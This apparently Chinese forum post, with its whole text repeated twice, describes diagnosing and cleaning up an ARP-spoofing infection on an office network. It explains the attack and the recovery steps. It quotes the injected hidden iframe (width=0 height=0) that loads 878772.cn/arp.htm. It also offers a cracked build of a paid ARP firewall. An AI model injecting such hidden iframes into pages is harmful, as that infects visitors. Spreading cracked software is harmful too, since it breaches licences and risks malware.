前几天开始,公司局域网就很不正常,频繁断网,网速巨慢。
偶然打开bbs.guzhenu.com发现正在从878772.cn读取数据...
查看源文件,第一句"<iframe src='ht\p:\\878772.cn/arp.htm' width=0 height=0></iframe> "
马上想到bbs.guzhenu.com被挂马,立即Q留言guzhneu的站长说他论坛被挂马了,3389登陆服务器一看..........完全正常啊..郁闷,赶紧谷歌了一下,原来arp浏览器劫持也~(只有局域网用户受此影响)
清 除系统internet所有缓存文件后再将C:\Documents and Settings\Administrator(可能要替换成你的用户名)\Local Settings\Temp里面的所有文件全部删除,~可能要在安全模式下才能删),然后再装个arp防火墙,就OK了~ 有空的时候再去找到局域网内的病毒源清除就没事了,呵呵.
一、什么是“ARP欺骗”?
ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。
第 二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了 网了,“网络掉线了”。ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
这次是公司局域网中某台电脑中了木马,造成局域网内的ARP欺骗,使得浏览网页时会自动在页面顶部加入 iframe 代码。
二、故障现象及原因分析
情况一、当局域网内某台主机感染了ARP病毒时,会向本局域网内(指某一网段,比如10.15.3.0这一段)所有主机发送ARP欺骗攻击,让原本流向网络中心的流量改道流向病毒主机,并通过病毒主机代理上网。因客户端具有防代理功能,造成受害者无法通过病毒主机上网。
由于病毒发作时发出大量数据包会将网络拥塞,大家会感觉上网速度越来越慢。中毒者同样如此,受其自身处理能力的限制,感觉运行速度很慢时,可能会采取重新启动或其他措施。此时病毒短时间停止工作,大家会感到网络恢复正常。如此反复,就造成网络时断时续。
情况二、局域网内有某些用户使用了ARP欺骗程序(如:网络执法官、网络剪刀手、传奇木马、QQ盗号软件等)发送ARP欺骗数据包,致使被攻击的电脑出现突然不能上网,过一段时间又能上网,反复掉线的现象。
三、故障诊断
如 果发现以上疑似情况,可以通过如下操作进行诊断:点击”开始”按钮->选择”运行”->输入”arp -d”->点击”确定”按钮,然后重新尝试上网,如果能恢复正常,则说明此次掉线可能是受ARP欺骗所致。注:”arp -d”命令用于清除并重建本机arp表。”arp -d”命令并不能抵御ARP欺骗,执行后仍有可能再次遭受ARP攻击。
四、故障处理
1、中毒者:使用趋势科技ARP病毒专杀工具查杀病毒(已提供下载,地址在顶上)
下载后解压缩,运行包内TSC.exe文件,不要关让它一直运行完,最后查看report文档便知是否中毒。
2、被害者:使用防火墙抵御ARP攻击(已提供下载)
http://bbs.023wz.com/dispbbs_2_11_1.html
可惜的是arp防火墙竟然是收费的,在这里发个破解版,呵呵~
先用原版安装,然后用Crack里面的文件替换同名文件~
偶然打开bbs.guzhenu.com发现正在从878772.cn读取数据...
查看源文件,第一句"<iframe src='ht\p:\\878772.cn/arp.htm' width=0 height=0></iframe> "
马上想到bbs.guzhenu.com被挂马,立即Q留言guzhneu的站长说他论坛被挂马了,3389登陆服务器一看..........完全正常啊..郁闷,赶紧谷歌了一下,原来arp浏览器劫持也~(只有局域网用户受此影响)
清 除系统internet所有缓存文件后再将C:\Documents and Settings\Administrator(可能要替换成你的用户名)\Local Settings\Temp里面的所有文件全部删除,~可能要在安全模式下才能删),然后再装个arp防火墙,就OK了~ 有空的时候再去找到局域网内的病毒源清除就没事了,呵呵.
一、什么是“ARP欺骗”?
ARP的意思是Address Resolution Protocol(地址解析协议),它是一个位于TCP/IP协议栈中的低层协议,负责将某个IP地址解析成对应的MAC地址。
从影响网络连接通畅的方式来看,ARP欺骗分为二种,一种是对路由器ARP表的欺骗;另一种是对内网PC的网关欺骗。
第一种ARP欺骗的原理是——截获网关数据。它通知路由器一系列错误的内网MAC地址,并按照一定的频率不断进行,使真实的地址信息无法通过更新保存在路由器中,结果路由器的所有数据只能发送给错误的MAC地址,造成正常PC无法收到信息。
第 二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关,让被它欺骗的PC向假网关发数据,而不是通过正常的路由器途径上网。在PC看来,就是上不了 网了,“网络掉线了”。ARP欺骗木马只需成功感染一台电脑,就可能导致整个局域网都无法上网,严重的甚至可能带来整个网络的瘫痪。
这次是公司局域网中某台电脑中了木马,造成局域网内的ARP欺骗,使得浏览网页时会自动在页面顶部加入 iframe 代码。
二、故障现象及原因分析
情况一、当局域网内某台主机感染了ARP病毒时,会向本局域网内(指某一网段,比如10.15.3.0这一段)所有主机发送ARP欺骗攻击,让原本流向网络中心的流量改道流向病毒主机,并通过病毒主机代理上网。因客户端具有防代理功能,造成受害者无法通过病毒主机上网。
由于病毒发作时发出大量数据包会将网络拥塞,大家会感觉上网速度越来越慢。中毒者同样如此,受其自身处理能力的限制,感觉运行速度很慢时,可能会采取重新启动或其他措施。此时病毒短时间停止工作,大家会感到网络恢复正常。如此反复,就造成网络时断时续。
情况二、局域网内有某些用户使用了ARP欺骗程序(如:网络执法官、网络剪刀手、传奇木马、QQ盗号软件等)发送ARP欺骗数据包,致使被攻击的电脑出现突然不能上网,过一段时间又能上网,反复掉线的现象。
三、故障诊断
如 果发现以上疑似情况,可以通过如下操作进行诊断:点击”开始”按钮->选择”运行”->输入”arp -d”->点击”确定”按钮,然后重新尝试上网,如果能恢复正常,则说明此次掉线可能是受ARP欺骗所致。注:”arp -d”命令用于清除并重建本机arp表。”arp -d”命令并不能抵御ARP欺骗,执行后仍有可能再次遭受ARP攻击。
四、故障处理
1、中毒者:使用趋势科技ARP病毒专杀工具查杀病毒(已提供下载,地址在顶上)
下载后解压缩,运行包内TSC.exe文件,不要关让它一直运行完,最后查看report文档便知是否中毒。
2、被害者:使用防火墙抵御ARP攻击(已提供下载)
http://bbs.023wz.com/dispbbs_2_11_1.html
可惜的是arp防火墙竟然是收费的,在这里发个破解版,呵呵~
先用原版安装,然后用Crack里面的文件替换同名文件~
